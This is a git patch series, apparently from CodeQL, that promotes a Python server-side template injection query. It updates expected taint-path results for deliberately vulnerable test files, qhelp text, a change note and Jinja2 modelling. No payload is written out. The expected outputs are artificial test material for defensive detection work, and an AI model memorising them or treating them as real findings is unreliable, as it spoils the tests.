CheetahSinks.py:21:16:21:22 | ControlFlowNode for request | CheetahSinks.py:21:16:21:27 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| CheetahSinks.py:21:16:21:27 | ControlFlowNode for Attribute | CheetahSinks.py:21:16:21:43 | ControlFlowNode for Attribute() | provenance | dict.get | -| CheetahSinks.py:21:16:21:43 | ControlFlowNode for Attribute() | CheetahSinks.py:21:5:21:12 | ControlFlowNode for template | provenance | | -| ChevronSsti.py:1:26:1:32 | ControlFlowNode for ImportMember | ChevronSsti.py:1:26:1:32 | ControlFlowNode for request | provenance | | -| ChevronSsti.py:1:26:1:32 | ControlFlowNode for request | ChevronSsti.py:10:16:10:22 | ControlFlowNode for request | provenance | | -| ChevronSsti.py:10:5:10:12 | ControlFlowNode for template | ChevronSsti.py:11:27:11:34 | ControlFlowNode for template | provenance | | -| ChevronSsti.py:10:16:10:22 | ControlFlowNode for request | ChevronSsti.py:10:16:10:27 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| ChevronSsti.py:10:16:10:27 | ControlFlowNode for Attribute | ChevronSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | provenance | dict.get | -| ChevronSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | ChevronSsti.py:10:5:10:12 | ControlFlowNode for template | provenance | | -| DjangoTemplates.py:6:8:6:14 | ControlFlowNode for request | DjangoTemplates.py:8:5:8:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| DjangoTemplates.py:8:5:8:12 | ControlFlowNode for template | DjangoTemplates.py:9:18:9:25 | ControlFlowNode for template | provenance | | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | provenance | | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | FlaskTemplate.py:10:8:10:14 | ControlFlowNode for request | provenance | | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | FlaskTemplate.py:11:39:11:45 | ControlFlowNode for request | provenance | | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | FlaskTemplate.py:17:41:17:47 | ControlFlowNode for request | provenance | | -| FlaskTemplate.py:10:8:10:14 | ControlFlowNode for request | FlaskTemplate.py:11:39:11:50 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| FlaskTemplate.py:11:39:11:45 | ControlFlowNode for request | FlaskTemplate.py:11:39:11:50 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| FlaskTemplate.py:11:39:11:50 | ControlFlowNode for Attribute | FlaskTemplate.py:11:39:11:66 | ControlFlowNode for Attribute() | provenance | dict.get | -| FlaskTemplate.py:17:41:17:47 | ControlFlowNode for request | FlaskTemplate.py:17:41:17:52 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| FlaskTemplate.py:17:41:17:52 | ControlFlowNode for Attribute | FlaskTemplate.py:17:41:17:68 | ControlFlowNode for Attribute() | provenance | dict.get | -| JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | JinjaSsti.py:10:25:10:32 | ControlFlowNode for template | provenance | | -| JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | JinjaSsti.py:20:28:20:35 | ControlFlowNode for template | provenance | | -| MakoSsti.py:6:10:6:16 | ControlFlowNode for request | MakoSsti.py:8:5:8:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| MakoSsti.py:8:5:8:12 | ControlFlowNode for template | MakoSsti.py:9:27:9:34 | ControlFlowNode for template | provenance | | -| TRender.py:5:13:5:19 | ControlFlowNode for request | TRender.py:6:5:6:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| TRender.py:6:5:6:12 | ControlFlowNode for template | TRender.py:7:24:7:31 | ControlFlowNode for template | provenance | | -nodes -| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for ImportMember | semmle.label | ControlFlowNode for ImportMember | -| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| AirspeedSsti.py:10:5:10:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| AirspeedSsti.py:10:16:10:22 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| AirspeedSsti.py:10:16:10:27 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| AirspeedSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| AirspeedSsti.py:11:30:11:37 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | semmle.label | ControlFlowNode for ImportMember | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| CheetahSinks.py:10:5:10:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| CheetahSinks.py:10:16:10:22 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| CheetahSinks.py:10:16:10:27 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| CheetahSinks.py:10:16:10:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| CheetahSinks.py:11:21:11:28 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| CheetahSinks.py:21:5:21:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| CheetahSinks.py:21:16:21:22 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| CheetahSinks.py:21:16:21:27 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| CheetahSinks.py:21:16:21:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| CheetahSinks.py:22:20:22:27 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| ChevronSsti.py:1:26:1:32 | ControlFlowNode for ImportMember | semmle.label | ControlFlowNode for ImportMember | -| ChevronSsti.py:1:26:1:32 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| ChevronSsti.py:10:5:10:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| ChevronSsti.py:10:16:10:22 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| ChevronSsti.py:10:16:10:27 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| ChevronSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| ChevronSsti.py:11:27:11:34 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| DjangoTemplates.py:6:8:6:14 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| DjangoTemplates.py:8:5:8:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| DjangoTemplates.py:9:18:9:25 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | semmle.label | ControlFlowNode for ImportMember | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| FlaskTemplate.py:10:8:10:14 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| FlaskTemplate.py:11:39:11:45 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| FlaskTemplate.py:11:39:11:50 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| FlaskTemplate.py:11:39:11:66 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| FlaskTemplate.py:17:41:17:47 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| FlaskTemplate.py:17:41:17:52 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| FlaskTemplate.py:17:41:17:68 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| JinjaSsti.py:10:25:10:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| JinjaSsti.py:20:28:20:35 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| MakoSsti.py:6:10:6:16 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| MakoSsti.py:8:5:8:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| MakoSsti.py:9:27:9:34 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| TRender.py:5:13:5:19 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| TRender.py:6:5:6:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| TRender.py:7:24:7:31 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -subpaths -#select -| AirspeedSsti.py:11:30:11:37 | ControlFlowNode for template | AirspeedSsti.py:2:26:2:32 | ControlFlowNode for ImportMember | AirspeedSsti.py:11:30:11:37 | ControlFlowNode for template | This Template depends on $@. | AirspeedSsti.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| CheetahSinks.py:11:21:11:28 | ControlFlowNode for template | CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | CheetahSinks.py:11:21:11:28 | ControlFlowNode for template | This Template depends on $@. | CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| CheetahSinks.py:22:20:22:27 | ControlFlowNode for template | CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | CheetahSinks.py:22:20:22:27 | ControlFlowNode for template | This Template depends on $@. | CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| ChevronSsti.py:11:27:11:34 | ControlFlowNode for template | ChevronSsti.py:1:26:1:32 | ControlFlowNode for ImportMember | ChevronSsti.py:11:27:11:34 | ControlFlowNode for template | This Template depends on $@. | ChevronSsti.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| DjangoTemplates.py:9:18:9:25 | ControlFlowNode for template | DjangoTemplates.py:6:8:6:14 | ControlFlowNode for request | DjangoTemplates.py:9:18:9:25 | ControlFlowNode for template | This Template depends on $@. | DjangoTemplates.py:6:8:6:14 | ControlFlowNode for request | user-provided value | -| FlaskTemplate.py:11:39:11:66 | ControlFlowNode for Attribute() | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | FlaskTemplate.py:11:39:11:66 | ControlFlowNode for Attribute() | This Template depends on $@. | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| FlaskTemplate.py:17:41:17:68 | ControlFlowNode for Attribute() | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | FlaskTemplate.py:17:41:17:68 | ControlFlowNode for Attribute() | This Template depends on $@. | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| JinjaSsti.py:10:25:10:32 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:25:10:32 | ControlFlowNode for template | This Template depends on $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | -| JinjaSsti.py:20:28:20:35 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:20:28:20:35 | ControlFlowNode for template | This Template depends on $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | -| MakoSsti.py:9:27:9:34 | ControlFlowNode for template | MakoSsti.py:6:10:6:16 | ControlFlowNode for request | MakoSsti.py:9:27:9:34 | ControlFlowNode for template | This Template depends on $@. | MakoSsti.py:6:10:6:16 | ControlFlowNode for request | user-provided value | -| TRender.py:7:24:7:31 | ControlFlowNode for template | TRender.py:5:13:5:19 | ControlFlowNode for request | TRender.py:7:24:7:31 | ControlFlowNode for template | This Template depends on $@. | TRender.py:5:13:5:19 | ControlFlowNode for request | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref deleted file mode 100644 index 90efec9f636..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -experimental/Security/CWE-074/TemplateInjection.ql From f0163894b679bc99dcc8f5dcb031b0432e12696d Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 17:23:49 +0000 Subject: [PATCH 0948/1267] fix link in qhelp refs --- python/ql/src/Security/CWE-074/TemplateInjection.qhelp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index 619d834d1cf..c3770d59cf2 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -25,6 +25,6 @@     -
  • Portswigger : [Server Side Template Injection](https://portswigger.net/web-security/server-side-template-injection)
    • +
  • Portswigger: Server-Side Template Injection.
    • From 494d779541f508f1f81dc85c06e914ea1269c805 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 17:43:36 +0000 Subject: [PATCH 0949/1267] Add changenote --- python/ql/src/change-notes/2024-11-21-template-injection.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 python/ql/src/change-notes/2024-11-21-template-injection.md diff --git a/python/ql/src/change-notes/2024-11-21-template-injection.md b/python/ql/src/change-notes/2024-11-21-template-injection.md new file mode 100644 index 00000000000..a2d782f8cc0 --- /dev/null +++ b/python/ql/src/change-notes/2024-11-21-template-injection.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* The Server Side Template Injection query (`py/template-injection`), originally contributed to the experimental query pack by @porcupineyhairs, has been promoted to the ain query suite. This query finds instances of templates for a template engine such as Jinja being constructed with user input. \ No newline at end of file From 0f0c1e1609c34c100c05dfe0c452f6a407aff159 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 22 Nov 2024 16:32:10 +0000 Subject: [PATCH 0950/1267] Test update --- .../library-tests/frameworks/django-v2-v3/template_test.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py index 2d25848fde6..ba98c8f4196 100644 --- a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py +++ b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py @@ -1,13 +1,13 @@ from django.template import Template, engines from django.urls import path -from django.http.response import HttpResponse, +from django.http.response import HttpResponse def a(request): # $requestHandler t = Template("abc").render() # $templateConstruction="abc" return HttpResponse(t) # $HttpResponse def b(request): # $requestHandler - # This case is not yet supported + # This case is not currently supported t = django.template.engines["django"].from_string("abc") # $MISSING:templateConstruction="abc" return HttpResponse(t) # $HttpResponse From 6e16ed52e886979450264578a9b21835391e6d66 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 09:49:31 +0000 Subject: [PATCH 0951/1267] Reveiw suggestions: Spelling/grammar fixes Co-authored-by: Taus --- python/ql/src/Security/CWE-074/TemplateInjection.qhelp | 2 +- python/ql/src/Security/CWE-074/TemplateInjection.ql | 2 +- python/ql/src/change-notes/2024-11-21-template-injection.md | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index c3770d59cf2..5b8827b05f3 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -18,7 +18,7 @@

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    -

    In the following case, user input is not used to construct the template; rather is only used for as the parameters to render the template, which is safe.

    +

    In the following case, user input is not used to construct the template; rather it is only used as the parameters to render the template, which is safe.

    In the following case, a SandboxedEnvironment is used, preventing remote code execution.

    diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.ql b/python/ql/src/Security/CWE-074/TemplateInjection.ql index 2ea68414259..53b0a2e9b15 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.ql +++ b/python/ql/src/Security/CWE-074/TemplateInjection.ql @@ -16,5 +16,5 @@ import TemplateInjectionFlow::PathGraph from TemplateInjectionFlow::PathNode source, TemplateInjectionFlow::PathNode sink where TemplateInjectionFlow::flowPath(source, sink) -select sink.getNode(), source, sink, "This Template construction depends on $@.", source.getNode(), +select sink.getNode(), source, sink, "This template construction depends on a $@.", source.getNode(), "user-provided value" diff --git a/python/ql/src/change-notes/2024-11-21-template-injection.md b/python/ql/src/change-notes/2024-11-21-template-injection.md index a2d782f8cc0..7c604e9c993 100644 --- a/python/ql/src/change-notes/2024-11-21-template-injection.md +++ b/python/ql/src/change-notes/2024-11-21-template-injection.md @@ -1,4 +1,4 @@ --- category: newQuery --- -* The Server Side Template Injection query (`py/template-injection`), originally contributed to the experimental query pack by @porcupineyhairs, has been promoted to the ain query suite. This query finds instances of templates for a template engine such as Jinja being constructed with user input. \ No newline at end of file +* The Server Side Template Injection query (`py/template-injection`), originally contributed to the experimental query pack by @porcupineyhairs, has been promoted to the main query suite. This query finds instances of templates for a template engine such as Jinja being constructed with user input. \ No newline at end of file From 55557f8dd3d5e73a959ca4ddfcc537f662380858 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 10:12:46 +0000 Subject: [PATCH 0952/1267] Use API graohs directly --- .../lib/semmle/python/frameworks/Jinja2.qll | 19 +++++-------------- 1 file changed, 5 insertions(+), 14 deletions(-) diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index 0d0a8d98921..070176077e3 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -33,22 +33,13 @@ module Jinja2 { result = ModelOutput::getATypeNode("jinja.Environment~Subclass").getASubclass*() } - /** Gets a reference to an instance of `jinja2.Environment`. */ - private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t) { - t.start() and - result = EnvironmentClass::classRef().getACall() - or - exists(DataFlow::TypeTracker t2 | result = instance(t2).track(t2, t)) - } - - /** Gets a reference to an instance of `jinja2.Environment`. */ - DataFlow::Node instance() { instance(DataFlow::TypeTracker::end()).flowsTo(result) } + API::Node instance() { result = classRef().getAnInstance() } /** A call to `jinja2.Environment.from_string`. */ - private class Jinja2FromStringConstruction extends TemplateConstruction::Range, - DataFlow::MethodCallNode - { - Jinja2FromStringConstruction() { this.calls(EnvironmentClass::instance(), "from_string") } + private class Jinja2FromStringConstruction extends TemplateConstruction::Range, API::CallNode { + Jinja2FromStringConstruction() { + this = EnvironmentClass::instance().getMember("from_string").getACall() + } override DataFlow::Node getSourceArg() { result = this.getArg(0) } } From dd8b7a4a8fa3e26a3f7d61ce612574d6709f922d Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 10:21:13 +0000 Subject: [PATCH 0953/1267] Add additional test for safe case in documentation --- .../ql/test/library-tests/frameworks/jinja2/template_test.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/python/ql/test/library-tests/frameworks/jinja2/template_test.py b/python/ql/test/library-tests/frameworks/jinja2/template_test.py index 587de84f621..23cc9f151b9 100644 --- a/python/ql/test/library-tests/frameworks/jinja2/template_test.py +++ b/python/ql/test/library-tests/frameworks/jinja2/template_test.py @@ -1,7 +1,11 @@ from jinja2 import Environment, Template +from jinja2.sandbox import SandboxedEnvironment def test(): env = Environment() t = env.from_string("abc") # $ templateConstruction="abc" t = Template("abc") # $ templateConstruction="abc" + + env2 = SandboxedEnvironment() + t = env.from_string("abc") # No result as we don't model SandboxedEnvironment. We may wish to instead specifically model it as NOT vulnerable to template injection vulnerabilities. return t \ No newline at end of file From ebaab89933aaa6d2b95672d54ee6e8c04602a110 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 10:29:37 +0000 Subject: [PATCH 0954/1267] Formatting updates --- python/ql/lib/semmle/python/Frameworks.qll | 1 - python/ql/src/Security/CWE-074/TemplateInjection.ql | 4 ++-- .../frameworks/django-v2-v3/template_test.py | 12 ++++++------ .../library-tests/frameworks/flask/template_test.py | 4 ++-- .../library-tests/frameworks/jinja2/template_test.py | 2 +- 5 files changed, 11 insertions(+), 12 deletions(-) diff --git a/python/ql/lib/semmle/python/Frameworks.qll b/python/ql/lib/semmle/python/Frameworks.qll index af9417308ab..e6af222a615 100644 --- a/python/ql/lib/semmle/python/Frameworks.qll +++ b/python/ql/lib/semmle/python/Frameworks.qll @@ -17,7 +17,6 @@ private import semmle.python.frameworks.Asyncpg private import semmle.python.frameworks.Baize private import semmle.python.frameworks.Bottle private import semmle.python.frameworks.BSon -private import semmle.python.frameworks.Bottle private import semmle.python.frameworks.CassandraDriver private import semmle.python.frameworks.Chameleon private import semmle.python.frameworks.Cherrypy diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.ql b/python/ql/src/Security/CWE-074/TemplateInjection.ql index 53b0a2e9b15..bc4c935bc37 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.ql +++ b/python/ql/src/Security/CWE-074/TemplateInjection.ql @@ -16,5 +16,5 @@ import TemplateInjectionFlow::PathGraph from TemplateInjectionFlow::PathNode source, TemplateInjectionFlow::PathNode sink where TemplateInjectionFlow::flowPath(source, sink) -select sink.getNode(), source, sink, "This template construction depends on a $@.", source.getNode(), - "user-provided value" +select sink.getNode(), source, sink, "This template construction depends on a $@.", + source.getNode(), "user-provided value" diff --git a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py index ba98c8f4196..1f59b4a03c2 100644 --- a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py +++ b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py @@ -2,14 +2,14 @@ from django.template import Template, engines from django.urls import path from django.http.response import HttpResponse -def a(request): # $requestHandler - t = Template("abc").render() # $templateConstruction="abc" - return HttpResponse(t) # $HttpResponse +def a(request): # $ requestHandler + t = Template("abc").render() # $ templateConstruction="abc" + return HttpResponse(t) # $ HttpResponse -def b(request): # $requestHandler +def b(request): # $ requestHandler # This case is not currently supported - t = django.template.engines["django"].from_string("abc") # $MISSING:templateConstruction="abc" - return HttpResponse(t) # $HttpResponse + t = django.template.engines["django"].from_string("abc") # $ MISSING:templateConstruction="abc" + return HttpResponse(t) # $ HttpResponse urlpatterns = [ path("a", a), # $ routeSetup="a" diff --git a/python/ql/test/library-tests/frameworks/flask/template_test.py b/python/ql/test/library-tests/frameworks/flask/template_test.py index 8d867e14829..e50ab706355 100644 --- a/python/ql/test/library-tests/frameworks/flask/template_test.py +++ b/python/ql/test/library-tests/frameworks/flask/template_test.py @@ -2,12 +2,12 @@ from flask import Flask, Response, stream_with_context, render_template_string, app = Flask(__name__) @app.route("/a") # $routeSetup="/a" -def a(): # $requestHandler +def a(): # $ requestHandler r = render_template_string("abc") # $ templateConstruction="abc" return r # $ HttpResponse @app.route("/b") # $routeSetup="/b" -def b(): # $requestHandler +def b(): # $ requestHandler s = stream_template_string("abc") # $ templateConstruction="abc" r = Response(stream_with_context(s)) # $ HttpResponse return r # $ HttpResponse diff --git a/python/ql/test/library-tests/frameworks/jinja2/template_test.py b/python/ql/test/library-tests/frameworks/jinja2/template_test.py index 23cc9f151b9..40004b4f1c5 100644 --- a/python/ql/test/library-tests/frameworks/jinja2/template_test.py +++ b/python/ql/test/library-tests/frameworks/jinja2/template_test.py @@ -7,5 +7,5 @@ def test(): t = Template("abc") # $ templateConstruction="abc" env2 = SandboxedEnvironment() - t = env.from_string("abc") # No result as we don't model SandboxedEnvironment. We may wish to instead specifically model it as NOT vulnerable to template injection vulnerabilities. + t = env2.from_string("abc") # No result as we don't model SandboxedEnvironment. We may wish to instead specifically model it as NOT vulnerable to template injection vulnerabilities. return t \ No newline at end of file From ef1d898b0d86bf0d2982ca6a65b54a9ff29bf0a0 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 10:44:48 +0000 Subject: [PATCH 0955/1267] Add qldoc --- python/ql/lib/semmle/python/frameworks/Jinja2.qll | 1 + 1 file changed, 1 insertion(+) diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index 070176077e3..0387db93631 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -33,6 +33,7 @@ module Jinja2 { result = ModelOutput::getATypeNode("jinja.Environment~Subclass").getASubclass*() } + /** Gets a reference to an instance of `jinja2.Environment`. */ API::Node instance() { result = classRef().getAnInstance() } /** A call to `jinja2.Environment.from_string`. */ From 462be46be9897ca9a7bd99f06d52eafb2e288bc6 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 20:54:03 +0000 Subject: [PATCH 0956/1267] Update test output --- .../CWE-074-TemplateInjection/TemplateInjection.expected | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected index 3a833787a98..f9210772839 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected @@ -12,5 +12,5 @@ nodes | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | subpaths #select -| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This Template construction depends on $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | -| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This Template construction depends on $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | From 8a778da25327d1fa6ebe62adcd326289cbc11871 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Mon, 9 Dec 2024 10:22:24 +0000 Subject: [PATCH 0957/1267] Apply suggestions from docs review Co-authored-by: Ben Ahmady <32935794+subatoi@users.noreply.github.com> --- python/ql/src/Security/CWE-074/TemplateInjection.qhelp | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index 5b8827b05f3..ee416b77eec 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -8,7 +8,7 @@

    Ensure that an untrusted value is not used to directly construct a template. - Jinja also provides a SandboxedEnvironment that prohibits access to unsafe methods and attributes, that can be used if constructing a template from user input is absolutely necessary. + Jinja also provides SandboxedEnvironment that prohibits access to unsafe methods and attributes. This can be used if constructing a template from user input is absolutely necessary.

    @@ -18,7 +18,7 @@

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    -

    In the following case, user input is not used to construct the template; rather it is only used as the parameters to render the template, which is safe.

    +

    In the following case, user input is not used to construct the template. Instead, it is only used as the parameters to render the template, which is safe.

    In the following case, a SandboxedEnvironment is used, preventing remote code execution.

